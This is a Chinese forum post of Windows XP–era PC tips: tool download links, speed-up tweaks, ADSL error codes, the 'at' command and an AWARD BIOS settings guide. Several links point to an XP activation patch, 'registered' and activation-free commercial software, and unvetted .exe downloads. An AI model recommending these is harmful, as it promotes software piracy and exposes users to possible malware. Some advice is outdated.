社区应用 最新帖子 精华区 社区服务 会员列表 统计排行
  • 8508阅读
  • 7回复

电脑高手宝典200招

楼层直达
级别: 光盘中级
发帖
1140
飞翔币
335
威望
303
飞扬币
8460
信誉值
0
一、工具地址

访问许多网站会自动连到某个特定网站的修复工具RepairHost.exe
http://zsbbs.3721.com/attachment.php?aid=20271

杀毒软件地址
http://zsbbs.3721.com/viewthread.php?tid=143360&fpage=1

ietools2.5.exe
http://zsbbs.3721.com/attachment.php?aid=54727

Windows优化大师 v6.0 Build 618 注册版
http://www.800down.com/view.asp?id=3924

windows多系统启动恢复工具
http://goldwww.51.net/gw_by_guymake.php

瑞星注册表修复工具
http://it.rising.com.cn/service/technology/RegClean_download.htm

流行病毒专杀工具(Spant)
http://www.spant.net/

Windows XP关机补丁
http://www.ku85.com/download/SoftView/SoftView_1002.html

“震荡波”专杀工具
http://db.kingsoft.com/download/3/113.shtml

震荡波补丁下载
http://www.cphot.com/Article_Show.asp?ArticleID=365

XP激活补丁
http://soft.ccsu.cn/SoftView/SoftView_443.html

黄山IE修复专家
下载地址:http://www.znmq.com/hs.exe

瑞星专杀工具免费下载:
http://it.rising.com.cn/service/technology/tool.htm

硬盘分区魔术师8.0初级教程
http://www.4bvip.com/Article_Show.asp?ArticleID=122

硬盘分区魔术师8.0
http://zp313.51.net/

Norton Antivirus 2004 简体中文免激活零售版(可能有时不能连接)
http://www.800down.com/view.asp?id=3766

二、23招打造极速WinXP

以往我们经常使用"碎片整理"使Windows运行的更快.但现在市场上出售的7200转硬盘,在寻道和传输两方面做了改进,有很多型号还附带有一个8M缓存,而且WinXP使用的NTFS文件系统比FAT系统更有效率。因此,"碎片整理"对提升电脑性能的作用已经非常有限。下面给出能够大幅提升电脑性能,让WinXP运行更快捷 、更可靠的23招实用技巧,希望对您有所帮助 :


1)在系统中安装Ultra-133硬盘加速扩充卡或带有8M缓存的ATA硬盘,可以有效减少系统的启动时间。

2)把内存增加到512M以上。

3)确定Windows XP使用的是NTFS文件系统。检查方法 :双击"我的电脑",在C :盘上右击鼠标,选择"属性",检查文件系统的类型。如果是FAT32,就把它转换成NTFS,方法是 :先备份所有重要的数据,然后选择"开始"菜单里的"运行",输入CMD后确认。在提示符下,输入CONVERT C : /FS :NTFS和回车。在这个过程中,最好不要中途异常中断,并确保系统中没有病毒。

  4)关闭文件索引功能。Windows索引服务要从硬盘上大量文件中提取信息并创建"关键字索引",如果硬盘上有数以千计的文件,这个功能可以加快从这些文件中搜索信息的速度。但Windows创建这个索引要花费很多时间,而且大多数人从来不使用这个功能。关闭的方法是 :双击"我的电脑",在硬盘和下面的子文件夹上右击鼠标,选择"属性",取消"使用索引以便快速查找文件"。如果有警告或错误信息出现(如"拒绝访问"),点击"忽略"即可。

5)升级主板和显卡的驱动程序,升级BIOS。

6)每三个月左右清空Windows的预读取文件夹(Windows\Prefetch)一次。Windows把频繁使用的数据存放在预读取文件夹中,需要再次使用这些数据时就可以大大加快读取速度。但时间一长,这个文件夹中就会有大量不再使用的垃圾数据存在,反而增加了Windows的读取时间,影响了系统性能。

7)每个月运行一次磁盘清理程序,删除临时和无用文件。方法 :双击"我的电脑",在C :盘上右击鼠标,选择"属性",点击"磁盘清理"按钮。

8)在"设备管理员"中双击IDE ATA/ATAPI控制器,到Primary/Secondary IDE Channel里将所有连接设备的转输模式都设定为使用DMA(如果可用)。

9)更新接线.采用了新式的硬盘后,应该同时为所有IDE设备换装80线的Ultra-133线缆。如果只安装一个硬盘,那么这个硬盘应该安装在线缆的顶端,不要安装在线缆中间的那个接口,否则可能发生信号异常。对于Ultra DMA硬盘驱动器来说,这些异常信号会影响驱动器发挥最佳性能。

10)清除所有spyware(间谍程序)。有很多免费软件,如AdAware,可以完成这个任务。清除后,所以包含spyware的软件都将不能正常工作,如果确实需要其中的某个软件,就把它重新安装一遍吧。

11)从启动组里删除不必要的程序。方法 :选择"开始"菜单里的"运行",输入"msconfig",进入"启动"选项卡,取消不想在系统启动时加载的项目。对于不能确定的项目,查阅一下"WinTasks Process Library"(进程库),里面包含了已知的系统进程、应用程序和spyware的描述。也可以在google等WEB搜索引擎中查找。

12)进入控制面板中的"增加/删除程序"项,删除不必要的和不用的程序。

13)关闭所有不必要的动画和活动桌面。方法 :在控制面板中点击"系统"图标,进入"高级"选项卡,对"性能"进行"设置",在"视觉效果"选项卡上, 选中"自定义"单选框,将有关用户界面特性设定为禁用状态。

14)使用Tweak-XP软件编辑系统注册表,进一步提升性能。

15)定期访问微软Windows更新站点,下载所有标有"Critical(重大)"标志的更新项目。

16)每周更新防病毒软件。系统中最好只安装一套防病毒软件,安装多套软件会对性能带来不利影响。

17)安装的字体数量不要超过500种,字体数量太多会使系统变慢。

18)不要对硬盘分区。Windows XP的NTFS文件系统在一个比较大的分区上运行会更有效率。以前,人们为了方便数据组织或重新安装操作系统时不必格式化整个硬盘而对硬盘进行分区。在Windows XP的NTFS文件系统中,重新安装操作系统已不必重新格式化分区,数据组织更可以通过文件夹来完成。例如,不需要再把大量的数据放到另外划分的D :盘上,可以创建一个命名为"D盘"的文件夹,数据放在这个文件夹中即不影响系统性能,又能起到很好的组织作用。

19)测试内存条(RAM)是否完好。建议使用免费程序MemTest86,先用这个程序制作一个启动盘,用此盘启动电脑后程序将对内存条运行10项不同的测试,每项测试进行3遍。如果测试中遇到错误,就关闭电脑,拔掉其中一根内存条(如果有多根的话),重新测试。仍掉坏的内存条,换上一根好的。

20)如果电脑上安装了CD或DVD刻录机,有时候升级驱动程序可以使刻录速度更快。

21)取消不必要的服务。Windows XP调用了许多用户可能根本用不到的服务,这些服务不仅影响运行速度,对保护系统安全也非常不利。因此,可以根据需要禁用不必要的系统服务。方法 :选择"开始"菜单里的"运行",输入"Services.msc"打开"服务管理控制台",通过更改服务的启动类型启动或停止该项服务。

22)如果感觉Windows的单窗口浏览器速度比较慢,可以加以改进,方法是 :打开"我的电脑",点击"工具"->"文件夹选项"->"查看",选中"使用独立的进程打开文件夹窗口"。这样可以防止一个较慢的设备影响用户界面的响应速度。

23)打开机箱,把灰尘和碎片打扫干净,每年至少做一次。同时检查一下所有的风扇是否工作正常,主板上的电容器有没有膨胀或泄漏。

至此,23招都用过一遍,是不是对自己的系统更满意了?

提醒 :虽然"碎片整理"对提升电脑性能作用有限,但一个没有碎片的硬盘总比一个布满碎片的硬盘消耗的功率少,况且,一旦硬盘损坏,如果硬盘上的数据连续存放,就更容易恢复.所以,仍建议每隔一段时间(根据机器使用情况,从数月到一年不等),对硬盘做一次"碎片整理"。


三、2000XP双系统启动问题

先装好了WindowsXP,然后再安装Windows 2000。开机后发现Windows XP的滚动条消失后,电脑即黑屏,无法进入登录画面。

  其实,这个问题是因为当安装好Windows 2000后,某些系统文件从高版本变回低版本,因此导致Windows XP无法识别。解决这个问题很简单:从Windows XP安装光盘中将I386目录中的NTLDR、DOSNET.INF复制到C盘根目录下替换现有文件即可。

  提示:安装多操作系统时,遵循Windows 98→Windows 2000→Windows XP→Windows 2003的顺序,就不会出现系统间互相“干扰”的问题。

四、ADSL拨号中出现的错误代码

Error 602 The port is already open

问题:拨号网络网络由于设备安装错误或正在使用,不能进行连接

原因:RasPPPoE没有完全和正确的安装

解决:卸载干净任何PPPoE软件,重新安装

 

Error 605 Cannot set port information

问题:拨号网络网络由于设备安装错误不能设定使用端口

原因:RasPPPoE没有完全和正确的安装

解决:卸载干净任何PPPoE软件,重新安装

 

Error 606 The port is not connected

问题:拨号网络网络不能连接所需的设备端口

原因:RasPPPoE没有完全和正确的安装,连接线故障,ADSL MODEM故障

解决:卸载干净任何PPPoE软件,重新安装,检查网线和 ADSL MODEM

 

Error 608 The device does not exist

问题:拨号网络网络连接的设备不存在

原因:RasPPPoE没有完全和正确的安装

解决:卸载干净任何PPPoE软件,重新安装

 

Error 609 The device type does not exist

问题:拨号网络网络连接的设备其种类不能确定

原因:RasPPPoE没有完全和正确的安装

解决:卸载干净任何PPPoE软件,重新安装

 

Error 611 The route is not available/612 The route is not allocated

问题:拨号网络网络连接路由不正确

原因:RasPPPoE没有完全和正确的安装,ISP服务器故障

解决:卸载干净任何PPPoE软件,重新安装,致电ISP询问

 

Error 617 The port or device is already disconnecting

问题:拨号网络网络连接的设备已经断开

原因:RasPPPoE没有完全和正确的安装,ISP服务器故障,连接线,ADSL MODEM故障

解决:卸载干净任何PPPoE软件,重新安装,致电ISP询问 ,检查网线和 ADSL MODEM

 

Error 619

问题:与ISP服务器不能建立连接

原因:ADSL ISP服务器故障,ADSL电话线故障

解决:检查ADSL信号灯是否能正确同步。致电ISP询问

 

Error 621 Cannot open the phone book file

Error 622 Cannot load the phone book file

Error 623 Cannot find the phone book entry

Error 624 Cannot write the phone book file

Error 625 Invalid information found in the phone book

问题:Windows NT或者Windows 2000 Server网络RAS网络组件故障

原因:软件安装问题

解决:卸载所有PPPoE软件,重新安装RAS网络组件和RasPPPoE

 

Error 630

问题:ADSL MODEM没有没有响应

原因:ADSL电话线故障,ADSL MODEM故障(电源没打开等)

解决:检查ADSL设备

 

Error 633

问题:拨号网络网络由于设备安装错误或正在使用,不能进行连接

原因:RasPPPoE没有完全和正确的安装

解决:卸载干净任何PPPoE软件,重新安装

 

Error 638

问题:过了很长时间,无法连接到ISP的ADSL接入服务器

原因:ISP服务器故障;在RasPPPoE所创建的不好连接中你错误的输入了一个电话号码

解决:运行其创建拨号的Raspppoe.exe检查是否能列出ISP服务,以确定ISP正常;把所使用的拨号连接中的 电话号码清除或者只保留一个0。

 

Error 645

问题:网卡没有正确响应

原因:网卡故障,或者网卡驱动程序故障

解决:检查网卡,重新安装网卡驱动程序

 

Error 650

问题:远程计算机没有响应,断开连接

原因:ADSL ISP服务器故障,网卡故障,非正常关机造成网络协议出错

解决:检查ADSL信号灯是否能正确同步,致电ISP询问;检查网卡,删除所有网络组件重新安装 网络。

 

Error 651

问题:ADSL MODEM报告发生错误

原因:Windows处于安全模式下,或其他错误

解决:出现该错误时,进行重拨,就可以报告出新的具体错误代码

 

Error 691

问题:输入的用户名和密码不对,无法建立连接

原因:用户名和密码错误,ISP服务器故障

解决:使用正确的用户名和密码,并且使用正确的ISP账号格式(name@service),致电ISP询问。

 

Error 718

问题:验证用户名时远程计算机超时没有响应,断开连接

原因:ADSL ISP服务器故障

解决:致电ISP询问

 

Error 720

问题:拨号网络无法协调网络中服务器的协议设置

原因:ADSL ISP服务器故障,非正常关机造成网络协议出错

解决:致电ISP询问,删除所有网络组件重新安装网络。

 

Error 734

问题:PPP连接控制协议中止

原因:ADSL ISP服务器故障,非正常关机造成网络协议出错

解决:致电ISP询问,删除所有网络组件重新安装网络。

 

Error 738

问题:服务器不能分配IP地址

原因:ADSL ISP服务器故障,ADSL用户太多超过ISP所能提供的IP地址

解决:致电ISP询问

 

Error 797

问题:ADSL MODEM连接设备没有找到

原因:ADSL MODEM电源没有打开,网卡和ADSL MODEM的连接线出现问题,软件安装以后相应的协议没有正确邦定,在创立拨号连接时,建立了错误的空连接

解决:检查电源,连接线;检查网络属性,RasPPPoE相关的协议是否正确的安装并正确邦定(相关协议),检查网卡是否出现?号或!号,把它设置为Enable;检查拨号连接的属性,是否连接的设备使用了一个“ISDN channel-Adapter Name(xx)” 的设备,该设备为一个空设备,如果使用了取消它,并选择 正确的PPPoE设备代替它,或者重新创立拨号连接。


五、at命令的用法


At
列出在指定的时间和日期在计算机上运行的已计划命令或计划命令和程序。必须正在运行“计划”服务才能使用 at 命令。

at [\\computername] [[id] [/delete] | /delete [/yes]]

at [\\computername] time [/interactive] [/every:date[,...]| /next:date[,...]] command

参数



如果在没有参数的情况下使用,则 at 列出已计划的命令。

\\computername

指定远程计算机。如果省略该参数,命令将安排在本地计算机。

id

指定指派给已计划命令的识别码。

/delete

取消已计划的命令。如果省略了 id,计算机中已计划的命令将被全部取消。

/yes

当删除已计划的事件时,对系统的查询强制进行肯定的回答。

time

指定运行命令的时间。将时间以 24 小时标记(00:00 [午夜] 到 23:59)的方式表示为小时:分钟。

/interactive

允许作业与在作业运行时登录用户的桌面进行交互。

/every:date[,...]

在每个星期或月的指定日期(例如,每个星期四,或每月的第三天)运行命令。将 date 指定为星期的一天或多天 (M,T,W,Th,F,S,Su),或月的一天或多天(使用 1 到 31 的数字)。用逗号分隔多个日期项。如果省略了 date,将假定为该月的当前日期。

/next:date[,...]

在重复出现下一天(例如,下个星期四)时,运行指定命令将 date 指定为星期的一天或多天 (M,T,W,Th,F,S,Su),或月的一天或多天(使用 1 到 31 的数字)。用逗号分隔多个日期项。如果省略了 date,将假定为该月的当前日期。

command

指定要运行的 Windows 2000 命令、程序(.exe 或 .com 文件)或批处理程序(.bat 或 .cmd 文件)。当命令需要路径作为参数时,请使用绝对路径,也就是从驱动器号开始的整个路径。如果命令在远程计算机上,请指定服务器和共享名的 UNC 符号,而不是远程驱动器号。如果命令不是可执行 (.exe) 文件,必须在命令前加上 cmd /c,例如:

cmd /c dir > c:\test.out


六、AWARD BIOS设置详解


  AWARD公司是世界最大的BIOS生产厂商之一,其产品也被广泛使用。但由于AWARD BIOS里面的信息都是基于英文且需要用户对相关专业知识的理解相对深入,使得普通用户设置起来感到困难很大。而如果这些设置不当的话,将会影响整台电脑的性能设置是不能正常使用,所以一份详细的设置说明是必要的。下面就介绍一下AWARD BIOS中的有关设置选项的含义和设置方法。

【Standard CMOS Setup】(标准设定)
  在本菜单中,用户可以修改日期、时间、第一主IDE设备(硬盘)和IDE设备(硬盘或CD-ROM)、第二个主IDE设备(硬盘或CD-ROM)和从IDE设备(硬盘或CD-ROM)、软驱A与B、显示系统的类型、什么出错状态要导致系统启动暂停等。主要说明如下:

(1) 用户可以在Type(类型)和Mode(模式)项设置为Auto,使BIOS自动检测硬盘。也可以在主菜单中的【IDE HDD Auto Detection】操作来设置。用户还可以使用User选项,手动设定硬盘的参数。您必须输入柱面数(Cyls),磁头数(Heads),写预补偿(Precomp),磁头着陆区(Landz),每柱面扇区数(Sectorxs),工作模式(Mode,内容见下)等几种参数。硬盘大小在上述参数设定后自动产生。

  硬盘工作模式(MODE)的三种选項:

NORMAL模式:传統的标准模式,支持硬盘容量最高至528MB。
LARGE模式:当硬盘容量超过528MB,而硬盘或操作系統不支持LBA模式时,可采用此选项。
LBA 模式(Logical Block Addressing Mode):适用于硬盘容量超过528M且支持"逻辑区块地址"(LBA)功能(一般都使用此项)
 

(2) 显示类型可选EGA/VGA(EGA、VGA、SEGA、SVGA、PGA显示适配卡选用)、CGA40(CGA显示卡,40列方式)、CGA80(CGA显示卡,80列方式)、MONO(单色显示方式,包括高分辨率单显卡)等四种,用户应根据情况正确选用。

(3) 暂停的出错状态选项有:
1. AllErrors:BIOS检测到任何错误,系统启动均暂停并且给出出错提示。
2. NoErrors:BIOS检测到任何错误都不使系统启动暂停。
3. All ,But Keyboard:除键盘错误外,BIOS检测到任何其它错误,均暂停系统启动并且给出出错提示。
4. All ,But Disk/Key:除键盘、磁盘错误外,BIOS检测到任何其它错误,均暂停系统启动并且给出出错提示。

【BIOS Features Setup】(功能设定)
  该项用来设置系统配置选项清单,其中有些选项由主板本身设计确定,有些选项用户可以进行修改设定,以改善系统的性能。主要说明如下:
(1) VirusWarning:病毒防御警告(缺省值为Disable),此功能可防止硬盘的关键磁区及分区被更改,任何试图写入该区的操作將会导致系統死机并形式警告信息。
注意:当安装新的操作系統(如Win95)时,请先取消(disable)此功能,以免因冲突而无法顺利安装。
(2) CPU Internal Cache:缺省为Enable(开启),它允许系统使用CPU内部的第一级Cache。486、586档次的CPU内部一般都带有Cache,除非当该项设为开启时系统工作不正常,此项一般不要轻易改动。该项若置为Disable(关闭),将会降低系统的性能。
(3) External Cache:缺省设为Enable,它用来控制主板上的第二级(L2)Cache。根据主板上是否带有Cache,选择该项的设置。
(4) Quick Power On Self Test:缺省设置为Enable,该项主要功能为加速系统上电自测过程,它将跳过一些自测试。使引导过程加快。
(5) IDE HDD Block Mode Sectors:IDE硬盘设定, 預设值为HDDMAX。新式IDE硬盘大多支持一次传输多个磁块的功能。启用(enable)本功能可加快硬盘存取速度。选項有HDDMAX、Disabled、2、4、8、16、及32。
(6) HDD Sequence SCSI/IDE First:IDE/SCSI硬盘开机优先顺序设定,缺省值为IDE。当同时安装SCSI及IDE硬盘时,本选项功能可用来选择以SCSI或IDE硬盘作为开机硬盘。
(7) BootSequence:选择驱动器启动顺序。一般有以下几种启动顺序:
[A,CD-ROM,C]、[CD-ROM,C,A]、[D,A]、[E,A]、[F,A]、[C only]、[A,C]、[C,A]
请注意,某些老式主板并不支持由CD-ROM启动,而现在的新主板增加了更多的启动顺序如LS120,ZIP等。
(8) Swap Floppy Drive:(交换软盘驱动器)缺省设定为Disable。当它Disable时,BIOS把软驱连线扭接端子所接的软盘驱动器当作第一驱动器。当它开启时,BIOS将把软驱连线对接端子所接的软盘驱动器当作第一驱动器,即在DOS下A盘当作B盘用,B盘当作A盘用。
(9) BootUp Floppy Seek:当Enable时,机器启动时BIOS将对软驱进行寻道操作。
(10) Floppy Disk Access Contol:当该项选在R/W状态时,软驱可以读和写,其它状态只能读。
(11) BootUp Numlock Strtus:该选项用来设置小键盘的缺省状态。当设置为ON时,系统启动后,小键盘的缺省为数字状态;设为OFF时,系统启动后,小键盘的状态为箭头状态。
(12) BootUp System Speed:该选项用来确定系统启动时的速度为HIGH还是LOW。
(13) Typematic Rate Setting:该项可选Enable和Disable。当置为Enable时,如果按下键盘上的某个键不放,机器按您重复按下该键对待(重复按键速度可在下面的选项中设置);当置为Disable时,如果按下键盘上的某个键不放,机器按键入该键一次对待。
(14) Typematic Rate:如果上面的选项置为Enable,那么可以用此选项设定当您按下键盘上的某个键一秒钟,那么相当于按该键6次。该项可选6、8、10、12、15、20、24、30。
(15) Typematic Delay:如果(13)选项置为Enable,那么可以用此选项设定按下某一个键时,延迟多长时间后开始视为重复键入该键。该项可选250、500、750、1000,单位为毫秒。
(16) Security Option:选择System时,每次开机启动时都会提示您输入密码,选择Setup时,仅在进入CMOS Setup时会提示您输入密码(该设置仅在设置了密码的情况下有效)。
(17) PS/2Mouse Function Control:当该项设为Enable,机器提供对于PS/2类型鼠标的支持。否则,选Disable。
(18) Assign PCI IRQ For VGA:选Enable时,机器将自动设定PCI显示卡的IRQ到系统的DRAM中,以提高显示速度和改善系统的性能。
(19) PCI/VGA Palett Snoop:该项用来设置PCI/VGA卡能否与MPEGISA/VESAVGA卡一起用。当PCI/VGA卡与MPEGISA/VESAVGA卡一起用时,该项应设为Enable,否则,设为Disable。
(20) OS/2 Select For DRAM>64MB:该项允许您在OS/2操作系统中,使用64M以上的内存。该项可选为NON-OS2,OS2。
(21) System BIOS Shadow:该选项的缺省设置默认为Enable,当它开启时,系统BIOS将拷贝到系统Dram中,以提高系统的运行速度和改善系统的性能。
(22) Video BIOS Shadow:缺省设定为开启(Enable),当它开启时,显示卡的BIOS将拷贝到系统DRAM中,以提高显示速度和改善系统的性能。
(23) C8000-CBFFF Shadow/DFFFF Shadow:这些内存区域用来作为其他扩充卡的ROM映射区,一般都设定为禁止(Disable)。如果有某一扩充卡ROM需要映射,则用户应搞清楚该ROM将映射地址和范围,可以将上述的几个内存区域都置为Enable;但这样将造成内存空间的浪费。因为映射区的地址空间将占用系统的640K~1024K之间的某一段内存。

 

【Chipset Features Setup】(芯片组功能设定)
  该项用来设置系统板上芯片的特性。它有以下选项:

注意:此菜单下的选项会因不同主板而不同,如果你不太了解它们的功能,最好设置为缺省值。

(1) ISA Bus Clockfrequency(PCICLK/4)ISA:传输速率率设定,设定值有:PCICLK/3;PCICLK/4。
(2) Auto Configuration:自动状态设定,当设定为Enabled时BIOS依最佳状况状态设定,此时BIOS会自动设定DRAMTiming,所以会有无法修改DRAM的细项时序,我们强烈建议选用Enabled,因为任意改变DRAM的时序可能造成系统不稳或不开机。
(3) Aggressive Mode:高级模式设定,当您想获得较好的效能时,而且系统在非常稳定状态下,可以尝试Enabled此项功能以增加系统效能,不过必须使用较快速DRAM(60ns以下)。
(4) VIDEO BIOS Cacheable:(视频快取功能,缺省值为Disable),为Enable时,启用快取功能以加快显示速度;为Disable时,取消此功能。
(5) Memory Holeat Address:(缺省值为None),一些ISA卡会要求使用14-16MB或15-16MB的内存地址空间,若选取14MB-16MB或15MB-16MB,则系統將无法使用这部份的内存空间。您可选取None来取消此功能。
(6) OnboardFDC SwapA:B:(A,B盘互換,缺省值为NoSwap),当启用(enable)本項功能时则A,B盘互換 。亦即原先A盘被指定成B盘,B盘被指定为A盘。如此一来,您就不需打开机箱互换排线了。
(7) OnboardSerialPort1:(缺省值为3F8H/IRQ4),设定主机板上串口1的位址及IRQ,选項有:3F8H/IRO4、2F8H/IRQ3、3E8H/IRQ4、2E8H/IRQ10、Disable。
(8) OnboardSerialPort2:(缺省值为2F8H/IRQ3),设定主机板上串口2的位址及IRQ,选項有:3F8H/IRQ4、2F8H/IRQ8、3E8H/IRQ4、2E8H/IRQ10、Disable。
(9) OnboardParallelPort:(缺省值为378H/IRQ7),设定主机板上并口的位址及IRQ。
(10) Parallel PortMode:(并口模式,缺省值为ECP+EPP),并口的操作模式有下列选項:
Normal:一般速度单向运行。
EPP:最高速度双向运行。
ECP:超高速双自运行。
ECP+EPP:ECP与EPP二种模式并用。
(11) ECP DMA Select:(ECP DMA通道选择,缺省值为3),若在ECP模式下操作时,则提供DMA通道选择,有1,3,Disable三种设定。
(12) UART2 UseInfrared:(缺省值为Disable),本項功能用来支持紅外线(IR)传输功能。为Enable时,则设定第二序列UART支持红外线传输功能。设为Disable时,则设定第二序列UART支持COM2。
注意:如果没有红外线设备,不要Enable此项,否则会造成不必要的麻烦,例如系统不识别MODEM。
(13) Onboard PCI IDE Enable:(主机板IDE通道设置,缺省值为Both),用来启用內建IDE通道。选项有:
Primary IDE Channel:仅启动主IDE通道(即第一IDE通道)。
Secondary IDE Channel:仅启动辅IDE通道(即第二IDE通道)。
Both:第一、二IDE通道均启用。
Disable:禁用所有IDE通道。
(14) IDE PIO Mode:这个设置取决于系统硬盘的速度,包括AUTO,0,1,2,3,4五个选项,Mode4硬盘传输速率大于是16.6MB/秒,其它模式的小于这个速率。请不要选择超过硬盘速率的模式,这样会丢失数据。
(15) IDE UDMA(UltraDMA) Mode:Intel430TX以后的芯片提供了Ultra DMA Mode,它可以把传输速率提高到一个新的水准。
(16) IDE0Master/SlaveMode,IDE1Master/SlaveMode:(硬盘时序模式设定,缺省值为Auto),设为Auto时,系統会自动检查四個IDE 装置的时序模式以确保以最佳速度运行。也可以自行设定时序模式为(0,1,2,3,4)。


【Power Management Setup】(节电功能设定)
  该项为电源管理设定,用来控制主板上的"绿色"功能。该功能定时关闭视频显示和硬盘驱动器以实现节能的效果。具体来说,实现节电的模式有四种:

1、Doze模式:当设定时间一到,CPU时钟变慢,其他设备照常运作;
2、Standby模式:当设定时间一到,硬盘和显示将停止工作,其他设备照常运作;
3、Suspend模式:当设定时间一到,除CPU以外的所有设备都将停止工作;
4、HDD Power Down模式:当设定时间一到,硬盘停止工作,其他设备照常运作。

该菜单项下面的可供选择的内容有以下几种:

(1) Power Management:节电模式的主控项,有四种设定:
Max Saving:(最大节电)在一个较短的系统不活动的周期(Doze、Standby、Suspend、HDDPowerDown四种模式的缺省值均为1分钟)以后,使系统进入节电模式,这种模式节电最大。
MIN Saving:(最小节电)在一段较长的系统不活动的周期在这种情况下,(Doze,Standby,Suspend三种模式的缺省值均为1小时,HDD Power Down模式的缺省值为15分钟)后,使系统进入节电模式。
Disable:关闭节电功能,是缺省设置。
User Defined:(用户定义)允许用户根据自己的需要设定节电的模式。

(2) VideoOFFOption:(显示器关闭设定,缺省值为Susp, Stby->Off),本选项用来设定在何种模式下关闭显示器,选项如下:
1. Susp,Stby->Off:只在待机(Standby)或暫停(Suspend)的省电模式下才关闭显示器。
2. Suspend->Off:只在暫停(Suspend) 模式下才关闭显示器。
3. Alwayson:在任何模式下均不关,显示器照常显示。
4. Allmodes->Off:在任何省电模式下均关闭显示器。

(3) Video Off Method:(视频关闭)该选项可设为V/HSync+Blank、Dpms、BlankScreen三种,具体如下:

1. V/HSync+Blank:将关闭显示卡水平与垂直同步信号的输出端口,向视频缓冲区写入空白信号。
2.DPMS(显示电源管理系统):设定允许BIOS在显示卡有节电功能时,对显示卡进行节能信息的初始化。只有显示卡支持绿色功能时,用户才能使用这些设定。如果没有绿色功能,则应将该行设定为Blank Screen(关掉屏幕)。
3. Blank Screen(关掉屏幕):当管理关掉显示器屏幕时,缺省设定能通过关闭显示器的垂直和水平扫描以节约更多的电能。没有绿色功能的显示器,缺省设定只能关掉屏幕而不能终止CRT的扫描。
(4) PM Timers(电源管理记时器):下面的几项分别表示对电源管理超时设置的控制。Doze,StandBy和Suspend Mode项设置分别为该种模式激活前的机器闲置时间,在MAX Saving模式,它每次在一分钟后激活。在MIN Saving模式,它在一小时后激活。
(5) Power Down、Resume Events(进入节电模式和从节电状态中唤醒的事件):该项下面所列述的事件可以将硬盘设在最低耗电模式,工作、等待和悬挂系统等非活动模式中若有事件发生,如敲任何键或IRQ唤醒、鼠标动作、MODEM振铃时,系统自动从电源节电模式下恢复过来。
(6) Soft-OffByPwr-Bttn:ATX机箱的设计不同于传统机箱,按下开关4秒以上才能关闭系统;选择instant-off方式将使ATX机器等同于传统机器,而若置为delay4sec方式,那么您按住开关的时间不足4秒时将使系统进入SuspendMode。


【PNP/PCI Configuration Setup】(即插即用与PCI状态设定)
  该菜单项用来设置即插即用设备和PCI设备的有关属性。

(1) PNP OS Installed:如果软件系统支持Plug-Play,如Win95,可以设置为YES。
(2) Resources ControlledBy:AWARD BIOS支持"即插即用"功能,可以检测到全部支持"即插即用"的设备,这种功能是为类似Win95之类操作系统所设计,可以设置Auto(自动)或Manual(手动)。
(3) Resources Configuration Data:缺省值是Disabled,如果选择Enabled,每次开机时,Extend System Configuration Data(扩展系统设置数据)都会重新设置。
(4) IRQ 3/4/5/7/9/10/11/12/14/15,Assingned To:在缺省状态下,所有的资源除了IRQ3/4,都设计为被PCI设备占用,如果某些ISA卡要占用某资源可以手动设置。


【Load BIOS Defaults】(载入BIOS缺省值)
  当系統安装后不太稳定,则可选用本功能。此时系统将会取消一些高效能的操作模式设定,而处在最保守状态下。因此使用它容易找到主机板的安全值和除去主板的错误。当选择本项时,主画面会出现下列信息:
Load BIOS Defaults(Y/N)?
键入Y并按Enter即可执行本项功能。
注意:本项功能不会影响CMOS內存储的"标准设定"(即【Standard CMOS Setup】项的设置值)


【Load Setup Defaults】(載入SETUP缺省值)
  此为BIOS出厂的设定值。此时系统会以最佳化的模式运行。选择此功能时,主画面会出现下列信息:
Load SETUP Defaults(Y/N)?
键入Y并按Enter即可执行本项功能。


【Supervisor Password And User Password Setup】(管理者与使用者密码设定)
  User Passowrd Setting功能为设定密码。如果要设定此密码,首先应输入当前密码,确定密码后按y,屏幕自动回到主画面。输入User Passowrd可以使用系统,但不能修改CMOS的内容。输入SupervisorPassword可以输入、修改CMOS BIOS的值,Supervisor Password是为了防止他人擅自修改CMOS的内容而设置的。用户如果使用IDE硬盘驱动器,该项功能可以自动读出硬盘参数,并将它们自动记入标准CMOS设定中,它最多可以读出四个IDE硬盘的参数。


【Saveand Exit Setup】將设定值儲存後,离开设置主画面。

【Exit Without Saving】不儲存设定值,直接离开设置主画面。
以上介绍了Award BIOS Setup的常用选项的含义及设置办法。由于每种版本的BIOS具体设置都有所不同,所以上面列举的设置项目,可能少于或多于你系统内的项目,但一般情况下,各种设置都大同小异,触类旁通。另外,由于AMI BIOS的设置同AWARD BIOS基本相同,这里就一一介绍。


免跳线CPU在BIOS中的设置

--------------------------------------------------------------------------------

  目前有不少免跳线主板采用BIOS程序设置CPU工作状态,这无疑是超频族的福音,因为它免去了许多麻烦,给用户带来了方便。如升技BH6、微星6119 W(中文BIOS)等主板,只要将CPU插好,启动计算机,进入BIOS设置程序,就可对CPU参数进行设置,设置的内容包括CPU工作电压、CPU外频和CPU内频等。下面就介绍具体的设置:
(1) CPU Operating Speed:CPU的内核工作速度设定。选项包括:User Define(用户定义)、233(66×3.5)、266(66×4)、300(66×4.5)、333(66×5)、350(100×3.5)、400(100×4)等选项。选择User Define后,CPU外频和倍频由用户在下面的(3)、(4)中自行设置。另外,最新的微星6119(W)的BIOS设置中的CPU Plug & Play选项,可自动检测CPU、设置其工作状态。
(2) Turbo Frequency:CPU外频加速模式设定。当Enable时,CPU的频率被提升2.5%,此项目仅在External Clock(外频)支持Turbo模式时方出现(目前只对100MHz提供支持)。
(3) External Clock:CPU外频设定,包括66、75、83、100、112、124、133MHz等选项。
(4) Multiplier Factor:CPU倍频设定,有2.0、2.5、3.0、3.5、4.0、4.5、5.0、5.5倍等选项
(5) SEL100/66# Signal:Signal 100/66信号设定,包括High"(高)和"Low"(低)两个选项。当设置为"High"时,CPU外频为100MHz,设置为"Low"时为66MHz。
注意:有些PⅡ350和PⅡ400运行在100MHz外频时,倍频分别被锁定于3.5和4.0倍频,SEL100/66#信号设置为"Low",可解除对倍频的锁定。
(6) AGPCLK/CPUCLK:AGP时钟设定。缺省值为2/3,此时AGP工作频率是CPU外频的2/3,如改设为1/1,则AGP工作频率等于CPU外频。
(7) Speed Error Hold:速度错误处理设定。包括"Disable"和"Enable"选项。默认 为"Disable"。如设置为"Enable"则相当于禁止超频,由系统自动检测CPU,发现设置值与CPU标称值不符时系统拒绝工作。
(8) CPU Power Supply:CPU电压设定。包括"CPU Default"(默认)和"User Define"(用户定义)选项。选择"User Define"时,需在(9)中设置CPU内核电压。
